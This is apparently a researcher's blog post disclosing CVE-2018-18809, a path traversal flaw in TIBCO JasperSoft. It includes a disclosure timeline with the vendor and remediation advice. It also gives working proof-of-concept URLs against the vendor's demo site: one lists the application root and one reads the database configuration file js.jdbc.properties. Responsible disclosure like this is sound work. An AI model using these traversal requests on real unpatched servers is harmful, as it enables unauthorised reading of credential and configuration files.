Background

About Tibco JasperSoft... basically I have no idea what it is and why it exists :) Some kind of Business Intelligence solution. Read it from their web, if needed.

Why I don't know - I "met" this software in the beginning of one pen-test case, found the problem described below, reported it to client and immediate decision was made to remove access to it and from pen-test scope. No further investigations made.

CVE-2018-18809 Proof-of-Concept on JasperSoft demo site mobiledemo.jaspersoft.com

Vulnerability is in reportresource/reportresource/ service and in resource parameter.

There is "defence" - value for resource param must start with net/sf/jasperreports/. It's clearly not enough but probably prefix requirement was able to fool scanners.

Preconditions

There are no preconditions for authentication or authorisation.

Proof-of-Concepts on JasperSoft own demo site on 2019-04-21 (notified 2018-10-11, fix is published from 2019-03-06).

File listing

Showing file listing from application root folder.

http://mobiledemo.jaspersoft.com/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../

CVE-2018-18809 Tibco JasperSoft Path traversal folder listing

Reading file

As an example - reading database configuration file js.jdbc.properties from application root folder.

http://mobiledemo.jaspersoft.com/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../js.jdbc.properties

CVE-2018-18809 Tibco JasperSoft Path traversal File reading

Critical impact

Impact - non-authenticated remote attacker can read file listing and file content from target site.

In own TIBCO Security Advisory Tibco measure the risk based on CVSS v3 9.9:

CVSS v3 Base Score: 9.9 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)

Only point which was missing from maxiumum is "Privileges required" with value "Low". Not sure why it wasn't "None".

Suggestion

Follow TIBCO Security Advisory: March 6, 2019 - TIBCO JasperReports Library - 2018-18809 "Solution" section.

Vulnerability Disclosure Timeline

Timezone for dates: Tallinn/Europe

  • 2018-10-15 | me > Tibco | Notification to security@tibco.com
  • 2018-10-15 | Tibco > me | Thanks for PoC

.. 2 weeks silence ..

  • 2018-10-29 | me > Tibco | How is going? No fixes even for their own site.
  • 2018-10-15 | Tibco > me | Explanation of policy that they threat everyone equally and as no fix available for their customer, they can not fix their own site also.

.. loooooong silence ..

  • 2019-01-11 | Tibco > me | Issue is still under investigation. Issue discovery credits and publishing details coordination for future.
  • 2019-01-11 | me > Tibco | Response, agreement with credits.

.. and fix is already available ..

.. ok, I'll write the Full Disclose finally. Went to recheck Tibco JasperSoft demo site - still vulnerable ..

  • 2019-04-21 | me > Tibco | I'm going to write Full Disclosure, but your own demo site is still vulnerable.
  • 2019-04-22 | Tibco > me | "Software still vulnerable or demo site still vulnerable?"
  • 2019-04-22 | me > Tibco | I haven't retested software, but demo site is still vulnerable.
  • 2019-04-26 | Tibco > me | Demo site fixed/updated now.

.. ouch, it's 2019-09-07 and what I found.. not published blog post :)

  • 2019-09-07 | me | Full Disclosure on security.elarlang.eu

Conclusion - I personally really don't share the attitude to keep own environment vulnerable just because no fix is available for clients.

Communication was friendly and professional - no unnecessary emotions or conflicts.

References


Comments

comments powered by Disqus